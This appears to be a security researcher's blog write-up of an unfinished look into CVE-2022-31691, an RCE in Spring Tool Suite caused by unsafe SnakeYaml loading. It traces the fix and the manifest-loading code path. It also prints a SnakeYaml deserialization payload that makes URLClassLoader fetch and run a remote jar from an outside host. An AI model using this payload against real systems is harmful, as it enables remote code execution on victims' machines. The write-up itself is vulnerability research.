SpindleSec / CVE-2022-31691

A write-up of my (so far inconclusive) look into CVE-2022-31691

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A write-up of my (so far inconclusive) look into CVE-2022-31691.


I'm a frequent user of the Spring Tool Suite (STS) for Eclipse, and tend to rely on it to initialise new Spring Boot projects. This vulnerability (see https://tanzu.vmware.com/security/cve-2022-31691) is an RCE which can be induced through unsafe loading of content from a yaml configuration file.

SnakeYaml is a very common yaml parser and emitter for Java. However, as with any marshalling/unmarshalling process, there's always the risk that unwanted content could be loaded straight into memory. SnakeYaml is no different - see https://code.google.com/archive/p/snakeyaml/wikis/Documentation.wiki#Tutorial.

Loading YAML
Warning: It is not safe to call Yaml.load() with any data received from an untrusted source!
The method Yaml.load() converts a YAML document to a Java object.

With that in mind, the project maintainers added a SafeConstructor method:

Note if you want to limit objects to standard Java objects like List or Long you need to use SafeConstructor.
Yaml yaml = new Yaml(new SafeConstructor());

The rationale is pretty clear, but this advice clearly isn't being well-heeded. You don't need to look far to see examples of unsafe loading practices. Even Baeldung (a wonderful source of information on Spring) fails to mention this in its guide: https://www.baeldung.com/java-snake-yaml#basic-usage.

In order to exploit this, I need to get this constructor to unmarshall an object that I have control over. Foruntately, others have already done the leg work here. https://github.com/artsploit/yaml-payload is a really simple project to generate SnakeYaml exploit payloads a la https://github.com/mbechler/marshalsec. The rationale is:

  • use the artsploit library to generate a gadget exploit jar
  • host that exploit jar on a local webserver
  • build a malicious yaml file that will trigger the load of that jar into memory
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://artsploit.com/yaml-payload.jar"]
  • work out which yaml files are being loaded by STS in an unsafe manner
  • create an eclipse project that incudes this malicious yaml file, and make sure it follows the above attack chain up to achieve code execution.

The STS changes

Find the commit

This vulnerability was fixed in STS version 4.16.1. A quick look over the commits in this version offer up a couple of helpful pointers as to what was fixed - https://github.com/spring-projects/sts4/compare/4.16.0.RELEASE...4.16.1.RELEASE

The message on this commit - "Use SafeConstructor in Snakeyaml YAML constructors" is a nice pointer to what's been fixed.

Sure enough, this is where the SafeConstructor is substituted.

YamlASTProvider parser = new YamlASTProvider(new Yaml(new SafeConstructor()));

If I'm interested in exploiting this, I need to get some malicious content into this SnakeYaml constructor, so I need to track down where it's called from.

Find where the input comes from

The SnakeYaml object creation is fed an InputStream object that's created by a method getInputStream().

getInputStream() calls getManifestFile() to determine which manifest file to load.

getManifestFile() returns either the location of a manifest file (if specified in the constructor), or null.

The ApplicationManifestHandler class is initialised in the CloudFoundryBootDashModel class here and is passed a value that's derived from a value set in the constructor for the resolveDeploymentProperties method here.

Where I am so far - blocked!

I'm pretty sure I need to get some CloudFoundry configuration in place in order to get it to try to load/invoke my malicious manifest.yml file.

It turns out that CloudFoundry is a dying technology, thanks to (I assume) Kubernetes and the like. I can't find any sort of public platforms to create a CF connection to, so I can't actually test things out from here.


Look into spinning up a local development instance of CloudFoundry, if only to test out my understanding of the vulnerability and exploit.


A write-up of my (so far inconclusive) look into CVE-2022-31691